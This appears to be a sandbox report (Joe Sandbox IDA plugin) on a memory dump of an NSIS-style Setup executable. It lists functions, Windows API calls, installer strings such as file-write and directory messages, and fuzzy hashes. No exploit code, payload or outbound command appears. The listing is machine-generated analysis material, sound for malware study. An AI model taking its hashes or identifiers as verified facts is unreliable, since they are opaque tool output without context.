Source File: 00000000.00000002.2208713460.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2208687940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208746197.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208992070.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: AddressHandleLibraryLoadModuleProc
String ID:
API String ID: 310444273-0
Opcode ID: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
Instruction ID: 23f85fcbdf3119ad7ff9d94b99dcad510d7c567b01d836bd9cab37df641e0753
Opcode Fuzzy Hash: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
Instruction Fuzzy Hash: 53D0123120010597C6001B65AE0895F776CEF95611707803EF542F3132EB34D415AAEC

Function 004062D5 Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
FindClose.KERNEL32(00000000), ref: 004062EC

Memory Dump Source

Source File: 00000000.00000002.2208713460.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2208687940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208746197.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208992070.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
Instruction ID: 3dd5e1b78c12f0f437ff376ab6b0e1f90f8becb0d3509d6a9a7f52ed6ae53baf
Opcode Fuzzy Hash: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
Instruction Fuzzy Hash: 7AD0C9315041205BC25127386E0889B6A589F163723258A7AB5A6E11E0CB388C2296A8

Function 00405479 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054B5
ShowWindow.USER32(?), ref: 004054D2
DestroyWindow.USER32 ref: 004054E6
SetWindowLongW.USER32(?,00000000,00000000), ref: 00405502
GetDlgItem.USER32(?,?), ref: 00405523
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405537
IsWindowEnabled.USER32(00000000), ref: 0040553E
GetDlgItem.USER32(?,00000001), ref: 004055ED
GetDlgItem.USER32(?,00000002), ref: 004055F7
SetClassLongW.USER32(?,000000F2,?), ref: 00405611
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00405662
GetDlgItem.USER32(?,00000003), ref: 00405708
ShowWindow.USER32(00000000,?), ref: 0040572A
KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040573C
EnableWindow.USER32(?,?), ref: 00405757
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040576D
EnableMenuItem.USER32(00000000), ref: 00405774
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040578C
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040579F
lstrlenW.KERNEL32(00447240,?,00447240,0046ADC0), ref: 004057C8
SetWindowTextW.USER32(?,00447240), ref: 004057DC
ShowWindow.USER32(?,0000000A), ref: 00405910

Strings

@rD, xrefs: 004057B9

Memory Dump Source

Source File: 00000000.00000002.2208713460.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2208687940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208746197.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208992070.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID: @rD
API String ID: 3282139019-3814967855
Opcode ID: 9cf786e25966daeabf755d20ab7dea7749e4d7b73da7bae0acc5cbd00c8c4fee
Instruction ID: 0f9b988f21b44e482dc064b3562f20aa73efc2902ac8c6ffeb9ddf27563d0ddb
Opcode Fuzzy Hash: 9cf786e25966daeabf755d20ab7dea7749e4d7b73da7bae0acc5cbd00c8c4fee
Instruction Fuzzy Hash: D8C1C371500A04EBDB216F61EE49E2B3BA9EB45345F00093EF551B12F0DB799891EF2E

Function 004015A0 Relevance: 56.4, APIs: 15, Strings: 17, Instructions: 351
sleepfilewindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostQuitMessage.USER32(00000000), ref: 00401648
Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
SetForegroundWindow.USER32(?), ref: 004016CB
ShowWindow.USER32(?), ref: 00401753
ShowWindow.USER32(?), ref: 00401767
SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
SetCurrentDirectoryW.KERNELBASE(?,004CB0B0,?,000000E6,0040F0D0,?,?,?,000000F0,?,000000F0), ref: 00401885
MoveFileW.KERNEL32(00000000,?), ref: 00401908
GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,0040F0D0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE

Strings

Rename: %s, xrefs: 004018F8
SetFileAttributes failed., xrefs: 004017A1
CreateDirectory: "%s" (%d), xrefs: 004017BF
CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
detailprint: %s, xrefs: 00401679
Rename on reboot: %s, xrefs: 00401943
Aborting: "%s", xrefs: 0040161D
IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
Jump: %d, xrefs: 00401602
SetFileAttributes: "%s":%08X, xrefs: 0040177B
Call: %d, xrefs: 0040165A
CreateDirectory: "%s" created, xrefs: 00401849
CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
Rename failed: %s, xrefs: 0040194B
Sleep(%d), xrefs: 0040169D
BringToFront, xrefs: 004016BD

Memory Dump Source

Source File: 00000000.00000002.2208713460.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2208687940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208746197.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208992070.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
API String ID: 2872004960-3619442763
Opcode ID: e7226c198396c3fe3a7f3bea8c4d52a2e846d2bb9e79691e18455936b93e1c7d
Instruction ID: b6b48939bc8a7188504c618ab7841b31fdd5898bf24c808f75461ec369738802
Opcode Fuzzy Hash: e7226c198396c3fe3a7f3bea8c4d52a2e846d2bb9e79691e18455936b93e1c7d
Instruction Fuzzy Hash: 0AB1F471A00204ABDB10BF61DD46DAE3B69EF44314B21817FF946B21E1DA7D4E40CAAE

Function 0040592C Relevance: 45.7, APIs: 15, Strings: 11, Instructions: 233
stringregistrylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327

lstrcatW.KERNEL32(004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0,-00000002,00000000,004D70C8,00403AC1,?), ref: 004059AE
lstrlenW.KERNEL32(00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0), ref: 00405A30
lstrcmpiW.KERNEL32(00462538,.exe,00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000), ref: 00405A43
GetFileAttributesW.KERNEL32(00462540), ref: 00405A4E

Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E

LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004C70A8), ref: 00405AB7
RegisterClassW.USER32(0046AD60), ref: 00405B0A
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B22
CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B5B

Part of subcall function 00403E95: SetWindowTextW.USER32(00000000,0046ADC0), ref: 00403F30

ShowWindow.USER32(00000005,00000000), ref: 00405B91
LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BA2
LoadLibraryW.KERNEL32(RichEd32), ref: 00405BAD
GetClassInfoW.USER32(00000000,RichEdit20A,0046AD60), ref: 00405BBD
GetClassInfoW.USER32(00000000,RichEdit,0046AD60), ref: 00405BCA
RegisterClassW.USER32(0046AD60), ref: 00405BD3
DialogBoxParamW.USER32(?,00000000,00405479,00000000), ref: 00405BF2

Strings

_Nb, xrefs: 00405AD1
RichEdit, xrefs: 00405BC4
@rD, xrefs: 00405965
RichEd20, xrefs: 00405B9D
RichEdit20A, xrefs: 00405BB6, 00405BBB
Control Panel\Desktop\ResourceLocale, xrefs: 00405972
.exe, xrefs: 00405A3D
RichEd32, xrefs: 00405BA8
.DEFAULT\Control Panel\International, xrefs: 00405999
@%F, xrefs: 004059F6
B%F, xrefs: 00405A1F

Memory Dump Source

Source File: 00000000.00000002.2208713460.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2208687940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208746197.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208992070.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
String ID: .DEFAULT\Control Panel\International$.exe$@%F$@rD$B%F$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
API String ID: 608394941-1650083594
Opcode ID: 0b5ab136357e203ee2e090d14ec2b93cf78a9c4147554daf2c52a3a548f14690
Instruction ID: 271ce27004ef92612bfc9362a6cc74883a37054a4c8cca7c49d128c059fded9a
Opcode Fuzzy Hash: 0b5ab136357e203ee2e090d14ec2b93cf78a9c4147554daf2c52a3a548f14690
Instruction Fuzzy Hash: 5E71A370604B04AED721AB65EE85F2736ACEB44749F00053FF945B22E2D7B89D418F6E

Function 00401A1F Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 185
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

lstrcatW.KERNEL32(00000000,00000000,%GuardsMounts%,004CB0B0,00000000,00000000), ref: 00401A76
CompareFileTime.KERNEL32(-00000014,?,%GuardsMounts%,%GuardsMounts%,00000000,00000000,%GuardsMounts%,004CB0B0,00000000,00000000), ref: 00401AA0

Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016

Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D

Strings

File: error, user cancel, xrefs: 00401B93
File: error creating "%s", xrefs: 00401AF0
File: wrote %d to "%s", xrefs: 00401BD0
File: error, user abort, xrefs: 00401B53
File: error, user retry, xrefs: 00401B40
File: overwriteflag=%d, allowskipfilesflag=%d, name="%s", xrefs: 00401A39
%GuardsMounts%, xrefs: 00401A53, 00401A5C, 00401A69, 00401A7B, 00401A8C, 00401AC2, 00401AD8, 00401AEF, 00401B07, 00401B5E, 00401B80, 00401BCE, 00401C10, 00401C19, 00401C23, 00401C29, 00401C3B
File: skipped: "%s" (overwriteflag=%d), xrefs: 00401B81

Memory Dump Source

Source File: 00000000.00000002.2208713460.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2208687940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208746197.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208992070.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
String ID: %GuardsMounts%$File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"
API String ID: 4286501637-3932316494
Opcode ID: 45ef1293b1ae6c8eded58fe2a9d20f8c0b73c793bdda268a0525958b422070da
Instruction ID: fe683e2e252f9e2189d7cf48164ff2fe6631720e8c40e43e96375682ff159270
Opcode Fuzzy Hash: 45ef1293b1ae6c8eded58fe2a9d20f8c0b73c793bdda268a0525958b422070da
Instruction Fuzzy Hash: 9D510871901114BADF10BBB1CD46EAE3A68DF05369F21413FF416B10D2EB7C5A518AAE

Function 00403587 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 182
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00403598
GetModuleFileNameW.KERNEL32(00000000,004DF0D8,00002004,?,?,?,00000000,00403A47,?), ref: 004035B4

Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76

GetFileSize.KERNEL32(00000000,00000000,004E30E0,00000000,004CF0B8,004CF0B8,004DF0D8,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00403600

Strings

soft, xrefs: 00403675
Null, xrefs: 0040367E
Inst, xrefs: 0040366C
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037C5
Error launching installer, xrefs: 004035D7

Memory Dump Source

Source File: 00000000.00000002.2208713460.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2208687940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208746197.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208992070.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: File$AttributesCountCreateModuleNameSizeTick
String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 4283519449-527102705
Opcode ID: ad9dd0192889ad844885e917e82d5b734c8172191f67072e787dfaf2e8a54f21
Instruction ID: 97831ba7e8e922ff386f77eab0e0d18630bd2de4bbb47cca7d976ce2c46b30f6
Opcode Fuzzy Hash: ad9dd0192889ad844885e917e82d5b734c8172191f67072e787dfaf2e8a54f21
Instruction Fuzzy Hash: 3151D5B1900204AFDB219F65CD85B9E7EB8AB14756F10803FE605B72D1D77D9E808B9C

Function 0040337F Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 166
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 004033E7
GetTickCount.KERNEL32 ref: 00403464
MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 00403491
wsprintfW.USER32 ref: 004034A4
WriteFile.KERNELBASE(00000000,00000000,?,7FFFFFFF,00000000), ref: 004034D3
WriteFile.KERNEL32(00000000,0041F150,?,00000000,00000000,0041F150,?,000000FF,00000004,00000000,00000000,00000000), ref: 0040356A

Strings

... %d%%, xrefs: 0040349E
P1B, xrefs: 004033A9
X1C, xrefs: 004033ED
X1C, xrefs: 0040343C

Memory Dump Source

Source File: 00000000.00000002.2208713460.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2208687940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208746197.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208992070.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: CountFileTickWrite$wsprintf
String ID: ... %d%%$P1B$X1C$X1C
API String ID: 651206458-1535804072
Opcode ID: 44661cc85d05d2ece2df72a1dadfaff530150b4f00ec14a98415859341c8c9fb
Instruction ID: 0313947f0097750978ec936bbe46de4fad37e772bc1cb17ec77dd8e30cfa9ece
Opcode Fuzzy Hash: 44661cc85d05d2ece2df72a1dadfaff530150b4f00ec14a98415859341c8c9fb
Instruction Fuzzy Hash: 88518D71900219ABDF10DF65AE44AAF7BACAB00316F14417BF900B7290DB78DF40CBA9

Function 00404F72 Relevance: 10.6, APIs: 7, Instructions: 73
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D

Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6

Memory Dump Source

Source File: 00000000.00000002.2208713460.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2208687940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208746197.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208992070.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
String ID:
API String ID: 2740478559-0
Opcode ID: 4a81920338a541d7bcc419c3bcbb2810a04374694b2a6e658d803f75c228445d
Instruction ID: 1d640e6b4f0869ec625b39ce8112f9bd6789598538fb42bade37fe3884716a8e
Opcode Fuzzy Hash: 4a81920338a541d7bcc419c3bcbb2810a04374694b2a6e658d803f75c228445d
Instruction Fuzzy Hash: 3C21B0B1900518BACF119FA5DD84E9EBFB5EF84310F10813AFA04BA291D7798E509F98

Function 00401EB9 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 78
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016

GlobalFree.KERNEL32(005FD458), ref: 00402387

Strings

Exch: stack < %d elements, xrefs: 00401ED8
Pop: stack empty, xrefs: 00401F2C
%GuardsMounts%, xrefs: 00401EFB, 00401F00, 00401F1A

Memory Dump Source

Source File: 00000000.00000002.2208713460.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2208687940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208746197.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208992070.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: FreeGloballstrcpyn
String ID: %GuardsMounts%$Exch: stack < %d elements$Pop: stack empty
API String ID: 1459762280-2509535738
Opcode ID: 1882500a3a7973729244276bdae00bfd603f91a0f1c5eacb79451a398e12722f
Instruction ID: ae7cb1f2c63b60d7baa415153617f8c61fd22799b34192a347ea6a0a5f6d971a
Opcode Fuzzy Hash: 1882500a3a7973729244276bdae00bfd603f91a0f1c5eacb79451a398e12722f
Instruction Fuzzy Hash: 4721D172601105EBE710EB95DD81A6F77A8EF44318B21003FF542F32D1EB7998118AAD

Function 00402713 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016

WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C

Strings

<RM>, xrefs: 00402713
WriteINIStr: wrote [%s] %s=%s in %s, xrefs: 00402775
%GuardsMounts%, xrefs: 00402770

Memory Dump Source

Source File: 00000000.00000002.2208713460.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2208687940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208746197.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208992070.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: PrivateProfileStringWritelstrcpyn
String ID: %GuardsMounts%$<RM>$WriteINIStr: wrote [%s] %s=%s in %s
API String ID: 247603264-2645915172
Opcode ID: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
Instruction ID: 1675f45263e21dacb3bd3d3c28f4c469aa899418fcec56767b4290250f933745
Opcode Fuzzy Hash: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
Instruction Fuzzy Hash: 05014F70D40319BADB10BFA18D859AF7A78AF09304F10403FF11A761E3D7B80A408BAD

